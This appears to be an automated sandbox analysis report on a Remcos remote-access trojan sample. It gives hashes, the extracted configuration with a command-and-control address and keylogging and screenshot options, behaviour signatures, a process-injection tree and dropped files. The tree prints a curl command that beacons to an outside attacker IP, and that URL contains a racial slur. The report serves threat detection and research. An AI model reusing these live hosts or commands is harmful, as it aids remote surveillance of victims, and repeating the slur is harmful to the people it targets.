remcos | 3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
22-04-2024 11:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

av_sec.exe
Size

11.2MB
MD5

ab2c5633a45550670bca99f5cb82310c
SHA1

1b41983e38999ab3dcbad4a74cf2c7bf6ef9711e
SHA256

3bcf561a6a414a306a3196ca7174fd99b966faacb8f0ce4fae4bc72d32a4aebf
SHA512

80c7f67c87aebabbaef79828d5f269229d6218ba12abb8473e71c95d9fe9e967ca288c1dcb97d2d97f67946b9350923318e298c2d7a276b25877b2c092bc7ec9
SSDEEP

196608:cz97cMnvqx44EpYRPY4jTrcWrYdTjBI/TY0rA1q:k9wIvqx4xYRPYirxkZ6/j

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

178.33.57.155:443

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-PM1AI7
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation WScript.exe
Executes dropped EXE 2 IoCs

Processes:

RttHlp.exeRttHlp.exe

pid process

3752 RttHlp.exe
3292 RttHlp.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 12 IoCs

Processes:

RttHlp.exeRttHlp.exe

pid	process
3752	RttHlp.exe
3752	RttHlp.exe
3752	RttHlp.exe
3752	RttHlp.exe
3752	RttHlp.exe
3752	RttHlp.exe
3752	RttHlp.exe
3292	RttHlp.exe
3292	RttHlp.exe
3292	RttHlp.exe
3292	RttHlp.exe
3292	RttHlp.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

RttHlp.exe

description pid process target process

PID 3292 set thread context of 3192 3292 RttHlp.exe cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings explorer.exe
Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

av_sec.exeRttHlp.exeRttHlp.execmd.exe

pid process

3888 av_sec.exe
3888 av_sec.exe
3752 RttHlp.exe
3292 RttHlp.exe
3292 RttHlp.exe
3192 cmd.exe
3192 cmd.exe
3192 cmd.exe
3192 cmd.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

RttHlp.execmd.exe

pid process

3292 RttHlp.exe
3192 cmd.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

av_sec.exe

pid process

3888 av_sec.exe

description	pid	process	target process
PID 3292 set thread context of 3192	3292	RttHlp.exe	cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	explorer.exe

pid	process
3888	av_sec.exe
3888	av_sec.exe
3752	RttHlp.exe
3292	RttHlp.exe
3292	RttHlp.exe
3192	cmd.exe
3192	cmd.exe
3192	cmd.exe
3192	cmd.exe

pid	process
3292	RttHlp.exe
3192	cmd.exe

pid	process
3888	av_sec.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

av_sec.exeRttHlp.exeRttHlp.execmd.exeexplorer.exeWScript.execmd.exe

description	pid	process	target process
PID 3888 wrote to memory of 3752	3888	av_sec.exe	RttHlp.exe
PID 3888 wrote to memory of 3752	3888	av_sec.exe	RttHlp.exe
PID 3888 wrote to memory of 3752	3888	av_sec.exe	RttHlp.exe
PID 3752 wrote to memory of 3292	3752	RttHlp.exe	RttHlp.exe
PID 3752 wrote to memory of 3292	3752	RttHlp.exe	RttHlp.exe
PID 3752 wrote to memory of 3292	3752	RttHlp.exe	RttHlp.exe
PID 3292 wrote to memory of 3192	3292	RttHlp.exe	cmd.exe
PID 3292 wrote to memory of 3192	3292	RttHlp.exe	cmd.exe
PID 3292 wrote to memory of 3192	3292	RttHlp.exe	cmd.exe
PID 3292 wrote to memory of 3192	3292	RttHlp.exe	cmd.exe
PID 3192 wrote to memory of 4276	3192	cmd.exe	explorer.exe
PID 3192 wrote to memory of 4276	3192	cmd.exe	explorer.exe
PID 3192 wrote to memory of 4276	3192	cmd.exe	explorer.exe
PID 3192 wrote to memory of 4276	3192	cmd.exe	explorer.exe
PID 4276 wrote to memory of 5056	4276	explorer.exe	WScript.exe
PID 4276 wrote to memory of 5056	4276	explorer.exe	WScript.exe
PID 4276 wrote to memory of 5056	4276	explorer.exe	WScript.exe
PID 5056 wrote to memory of 4336	5056	WScript.exe	cmd.exe
PID 5056 wrote to memory of 4336	5056	WScript.exe	cmd.exe
PID 5056 wrote to memory of 4336	5056	WScript.exe	cmd.exe
PID 4336 wrote to memory of 4944	4336	cmd.exe	curl.exe
PID 4336 wrote to memory of 4944	4336	cmd.exe	curl.exe
PID 4336 wrote to memory of 4944	4336	cmd.exe	curl.exe
PID 3192 wrote to memory of 4276	3192	cmd.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\av_sec.exe
"C:\Users\Admin\AppData\Local\Temp\av_sec.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3888

C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3752

C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
C:\Users\Admin\AppData\Roaming\Beaconserver4\RttHlp.exe
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\SysWOW64\cmd.exe
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3192

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
5⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
6⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
7⤵
- Suspicious use of WriteProcessMemory
PID:4336

C:\Windows\SysWOW64\curl.exe
curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
8⤵
PID:4944

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7c3b8ec6
Filesize
5.5MB

MD5
320634072eddd5b14ddddcf0e32d6608

SHA1
d8db9bf00db95b25d2cd8b2c5888d250b535232b

SHA256
bba6f76185241df9bf477ca6c815fb4914d000489ce84f54ed17eeda199a1714

SHA512
8ea9e10a14de6f84041af79548a07936e84ececfdcab9c248aaab4bb80f1e387a6c421afb35e93c619698d6c93b5ebdace3b2f858910a74076c827d5e24971ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\88272629
Filesize
1.2MB

MD5
12ad93d7558435d8e5ac08e0c364eec4

SHA1
cbea88e4cded218206436a78da6290fcfdbbcfd6

SHA256
02c127bf3a858425d1bfd8201022319e6bc2f36c3bbd91a533612c92cdecb2bc

SHA512
fa59eb5125b747150c2613edc4b165af7c8b5df0fa8413fe7936003b4d1226449153eb5cf44d5c22f34dda56f8c23ac802993f6d0575060ceb7acceff1a7e5ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\Register.dll
Filesize
1.0MB

MD5
40b9628354ef4e6ef3c87934575545f4

SHA1
8fb5da182dea64c842953bf72fc573a74adaa155

SHA256
372b14fce2eb35b264f6d4aeef7987da56d951d3a09ef866cf55ed72763caa12

SHA512
02b0ea82efbfbe2e7308f86bfbec7a5109f3fe91d42731812d2e46aebedce50aabc565d2da9d3fbcd0f46febbff49c534419d1a91e0c14d5a80f06b74888c641

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\RttHlp.exe
Filesize
135KB

MD5
a2d70fbab5181a509369d96b682fc641

SHA1
22afcdc180400c4d2b9e5a6db2b8a26bff54dd38

SHA256
8aed681ad8d660257c10d2f0e85ae673184055a341901643f27afc38e5ef8473

SHA512
219c6e7e88004fad9f4392be9a852c58fc43b7f6900e40370991427f37eaea5c18f48d2954f9479dde8bcb787345f4e292d5620add8224aec4d93d7968820b83

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\bronzite.rpm
Filesize
11KB

MD5
6e4ffb2517b3570bf0c6766b8a0253fa

SHA1
2143b82dd1c8c3f4d0e0b146e65667a4e8552a9e

SHA256
d690d10eac73dada021f73aa41e2e5f5f41d043ec3372512e138dc2f77623f41

SHA512
d15317ea42fcb44a247f6300e33f14079e166b8a5bce285099b0ee21c68ce6ed753fcb8279956d27c94deabd28586fc142b1d4b3c852e0b181691dc55c58aa6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\globule.jpg
Filesize
1.0MB

MD5
4b12739a07c02ef25a45d80516a87100

SHA1
d976238dd9a697b7c35f85d3157282dfb68f4522

SHA256
f003145b18b53ca237f3a0c1e7a21481c335467fe265474555dbc8e576d95fb6

SHA512
f91ee89bd928d6880e4c58ffdfea47cd54e3ef38b50181e3717b7cc67ca0e03d764478a34ffccb7d2ddf72f85a1d2940729c79c8d727c960db615921974b7265

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\rtl120.bpl
Filesize
1.1MB

MD5
adf82ed333fb5567f8097c7235b0e17f

SHA1
e6ccaf016fc45edcdadeb40da64c207ddb33859f

SHA256
d6dd7a4f46f2cfde9c4eb9463b79d5ff90fc690da14672ba1da39708ee1b9b50

SHA512
2253c7b51317a3b5734025b6c7639105dbc81c340703718d679a00c13d40dd74ccaba1f6d04b21ee440f19e82ba680aa4b2a6a75c618aed91bd85a132be9fc92

Download Submit
C:\Users\Admin\AppData\Local\Temp\Beaconserver4\vcl120.bpl
Filesize
1.9MB

MD5
95ecaf8770cb3d948f45588fc04e0dfd

SHA1
49890478b975dcbb7bac20e330d9498312583f85

SHA256
5708ca3e0c822212494d2c4d51b2391904120cc5366adbc46e90fa9183d6b285

SHA512
55fa8098cbbc1503e2603f7dee57173ce429f6f5da8a00b37c79744f6063d2c46918e993712f24a42857b6ff87092fa1b4dc7c8f40483930b596824a6ffcb2bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\check1.vbs
Filesize
146B

MD5
85a2ebad40c21ba1da77230265b5351f

SHA1
803822e08837ebda5de7dde963e4872ae2fc4c21

SHA256
b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9

SHA512
77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

Download Submit
memory/3192-77-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3192-72-0x00007FF95BD70000-0x00007FF95BF65000-memory.dmp

Filesize
2.0MB

Download
memory/3192-74-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3192-75-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3192-68-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3292-62-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3292-69-0x0000000050000000-0x0000000050116000-memory.dmp

Filesize
1.1MB

Download
memory/3292-59-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3292-61-0x00007FF95BD70000-0x00007FF95BF65000-memory.dmp

Filesize
2.0MB

Download
memory/3292-65-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3752-57-0x0000000050000000-0x0000000050116000-memory.dmp

Filesize
1.1MB

Download
memory/3752-49-0x0000000000400000-0x0000000000421000-memory.dmp

Filesize
132KB

Download
memory/3752-60-0x0000000050120000-0x000000005030D000-memory.dmp

Filesize
1.9MB

Download
memory/3752-36-0x00000000752D0000-0x000000007544B000-memory.dmp

Filesize
1.5MB

Download
memory/3752-37-0x00007FF95BD70000-0x00007FF95BF65000-memory.dmp

Filesize
2.0MB

Download
memory/3888-16-0x00007FF93DDF0000-0x00007FF93DF62000-memory.dmp

Filesize
1.4MB

Download
memory/3888-1-0x000001B7D7AB0000-0x000001B7D7AB1000-memory.dmp

Filesize
4KB

Download
memory/3888-21-0x00007FF93DDF0000-0x00007FF93DF62000-memory.dmp

Filesize
1.4MB

Download
memory/3888-0-0x0000000000E40000-0x00000000019A4000-memory.dmp

Filesize
11.4MB

Download
memory/3888-9-0x00007FF93DDF0000-0x00007FF93DF62000-memory.dmp

Filesize
1.4MB

Download
memory/3888-7-0x00007FF93DDF0000-0x00007FF93DF62000-memory.dmp

Filesize
1.4MB

Download
memory/3888-63-0x00007FF93DDF0000-0x00007FF93DF62000-memory.dmp

Filesize
1.4MB

Download
memory/4276-79-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-81-0x0000000000530000-0x0000000000963000-memory.dmp

Filesize
4.2MB

Download
memory/4276-78-0x00007FF95BD70000-0x00007FF95BF65000-memory.dmp

Filesize
2.0MB

Download
memory/4276-86-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-87-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-88-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-89-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-90-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-91-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download
memory/4276-92-0x0000000000400000-0x0000000000483000-memory.dmp

Filesize
524KB

Download